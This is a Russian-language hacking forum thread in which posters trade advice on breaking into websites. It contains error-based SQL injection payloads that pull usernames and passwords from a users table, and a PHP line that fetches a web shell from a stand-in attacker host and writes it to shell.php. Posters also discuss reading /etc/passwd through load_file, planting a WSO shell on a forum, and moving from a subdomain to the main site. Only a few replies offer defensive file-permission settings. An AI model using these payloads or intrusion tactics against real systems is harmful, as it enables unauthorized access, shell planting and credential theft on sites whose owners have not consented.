to абвгдешка Code: -1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+limit+0,1), FLOOR(RAND(0)*2), 64))
to bodrich У Вас не получается, потому как может стоять FreeBSD там нет wget'a там fetch стоит по умолчанию,a лучше делать через file_put_contents("shell.php",file_get_contents("http://evilsite.com/shell.txt")) Может уже есть там такой файл? И лейте в папку со смайлами!
Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?
Товарищи! Тема: phpmyadmin имеется доступ к /scripts/setup.php точнее: версия 2.11.2.2 сплоиты не пашут. Можно ли что-то сотворить чтобы войти в админку? спасибо. PS: на кнопки хоть тыкай, хоть нет: config.inc.php пуст,как добавить нового юзера понятия не имею
Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела. Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись. Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта. Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать? Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта. Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)
Га-Ноцри если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место chmod 750, допустим по поводу мускулного запрета (secure_file_priv) , читай тут
Зачем вот так усложнять запрос? Лишнее палево в логах. Code: 1' or 1 group by concat(version(),rand(0)|) having min(0) Having min(0) не всегда нужен.
У Вас ошибка молодой человек, решили "поумничать", так писали бы правильно! Code: 1' or 1 group by concat(version(),rand(0)|[b]0[/b]) having min(0)
Опечатка настолько действительна? Я думаю кому это реально интересно, сможет заметить. И откуда тебе знать, может это скрипт киддинг?
ребят,а заливал кто шелл в cms-ку Cartweaver поимел админку,а залиться не выходит...нашел блайнд-скулю,но через неё тоже не вышло...тем более mysql <5 если есть умельцы,отзовитесь,пожалуйста...очень важно
Узнать кто хостер, и взять тест на пару дней, многие хостеры предоставляют такую услугу. Ну а дальше дело техники...
В дополнение, могу упомянуть возможность использования php технологий gid-uid - те верификации пользователя:группы при запуске скрипта. Как-то: suexec, apache-mpm etc. В таком случае, скорее всего, даже если директория будет 0777 - nто если uid MYSQL(user) отличается от владельца(создателя) файла(директории) в корне сайта - то не прочтешь и не зальешь. В таком случае надо искать директории на которые выставлены специфические права позволяющие это делать.
Подскажите пожалуйста, залил шел wso2 на форум (forum.site.ru), возможно ли как то получить доступ к файлам site.ru? простой переход на директорию ниже не выходит Safe mode: OFF Open base dir: var/www/u1111/www/forum.site.ru
Нетривиальный вопрос. Варианты ответов: Если домен на одной тачке с поддоменом: 1) Да, поднимись выше в директории и пошарься там, если права позволяют 2) Да, поднимись выше в директории и пошарься там, предварительно рутнув хост Если домен на разных тачках с поддоменом: 1) Да, если при коннекте в бд всплыла БД основного сайта. Меняешь что надо - цепляйешься в админку самого домена и льёшь новый шелл. 2) Нет, не фартануло, не повезло. Конечно, есть вариации....
На одном хостинге, выше подняться не позволяют права, мне даже не то что бы доступ к файлам нужен был, а получить список файлов (ардрес админки найти)
у форума адрес админки никак не выше директивы с самим форумом, либо в этой же директории, либо в поддиректории. Читай php файлы - увидешь как и куда логиниться